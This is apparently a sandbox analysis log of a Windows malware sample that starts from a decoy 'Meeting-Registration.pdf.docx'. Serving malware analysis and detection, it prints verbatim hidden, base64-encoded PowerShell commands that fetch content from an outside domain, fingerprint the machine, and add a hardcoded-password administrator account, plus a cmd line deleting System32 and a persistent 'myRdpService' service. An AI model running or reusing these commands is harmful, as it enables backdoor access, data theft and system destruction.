        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES352B.tmp" "c:\Users\user\AppData\Local\Temp\vz2enilj\CSC2427E8DFE2D64B98811230F26E9EEEB4.TMP"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\AppData\Local\Temp\Meeting-Registration.pdf.docx" /o ""Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwB1AHkAdAAxAG4AOABkAGUAZAA5AGYAYgAzADgAMAAuAGMAbwBtAC8AZgBpAGwAZQAyAC8AMABmAGQAYQBhADAAMwA4AGEAZAA2AGMAMgBlAGUAYQA0ADUAMQAwADIAZQA3AGMAYQA5AGYAYQA0ADEANgA3ADgANQA4AGUAZgBlADkAZAA3ADkAOQA1AGYAMABjAGYANAAyAGYAMQBkAGEAOAAwADkAMAA0ADAAMgBjAGUAZgBjADIANQA1ADQAZABkAGQAYQBjAGQAMAAyAGEAYgBjADcAZgA5ADEAZABhADYANwA1ADEAYwBjAGMAZQA5ADAAZABkADQAOAA4ADcAYgAxADEANgA0ADUANQBlADQAOQBiAGUAOAAxAGQAYgAxADAAZgA4ADAAYgBhAGEAMQAxAGEANAAyADQAZgAwADAANQBkADYAZABiAGQAYQBkADcANQA0ADgANwA2AGQANQA5AGUANQBmADQANgAwAGIAMQBjADQAZgBmAGIAYQA5AGMAZABkADEAYQA0AGMAMwA5ADcAMAA1ADUAYQAwADIAOABlADAAMgA2ADIAMQBlADYAZAA0AGMAZQAxADQANABlADAAZgBlADgAMQA4AGIANwAwAGUANgAyADEAYwA5AGYANABmADgANwA2ADcAOQAxACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c del /q "C:\Windows \System32\*" & rmdir "C:\Windows \System32" & rmdir "C:\Windows \"
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand JABVAHMAZQByAG4AYQBtAGUAIAA9ACAAIgBVAHMAZQByADEAIgA7ACQAcAB3AGQAIAA9ACAAIgAxADIAMwA0ADUANgA3ADgAOQAhAEEAMQBhACIAOwAgACQAVQBzAGUAcgBQAGEAcgBhAG0AcwAgAD0AIABAAHsAJwBOAGEAbQBlACcAIAA9ACAAJABVAHMAZQByAG4AYQBtAGUAOwAgACcAUABhAHMAcwB3AG8AcgBkACcAIAA9ACAAKABDAG8AbgB2AGUAcgB0AFQAbwAtAFMAZQBjAHUAcgBlAFMAdAByAGkAbgBnACAALQBTAHQAcgBpAG4AZwAgACQAcAB3AGQAIAAtAEEAcwBQAGwAYQBpAG4AVABlAHgAdAAgAC0ARgBvAHIAYwBlACkAOwAgACcAUABhAHMAcwB3AG8AcgBkAE4AZQB2AGUAcgBFAHgAcABpAHIAZQBzACcAIAA9ACAAJAB0AHIAdQBlAH0AOwBOAGUAdwAtAEwAbwBjAGEAbABVAHMAZQByACAAQABVAHMAZQByAFAAYQByAGEAbQBzADsAJABHAHIAbwB1AHAAUABhAHIAYQBtAHMAIAA9ACAAQAB7ACcARwByAG8AdQBwACcAIAA9ACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByAHMAJwA7ACAAJwBNAGUAbQBiAGUAcgAnACAAPQAgACQAVQBzAGUAcgBuAGEAbQBlAH0AOwBBAGQAZAAtAEwAbwBjAGEAbABHAHIAbwB1AHAATQBlAG0AYgBlAHIAIABAAEcAcgBvAHUAcABQAGEAcgBhAG0AcwA7AA0ACgA=
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc stop "myRdpService"
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc query myRdpService
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService"
        Source: C:\Windows\Temp\svczHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc stop "myRdpService"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query myRdpService
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "myRdpService"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net start "myRdpService"
        Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 start "myRdpService"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mshtml.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msiso.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
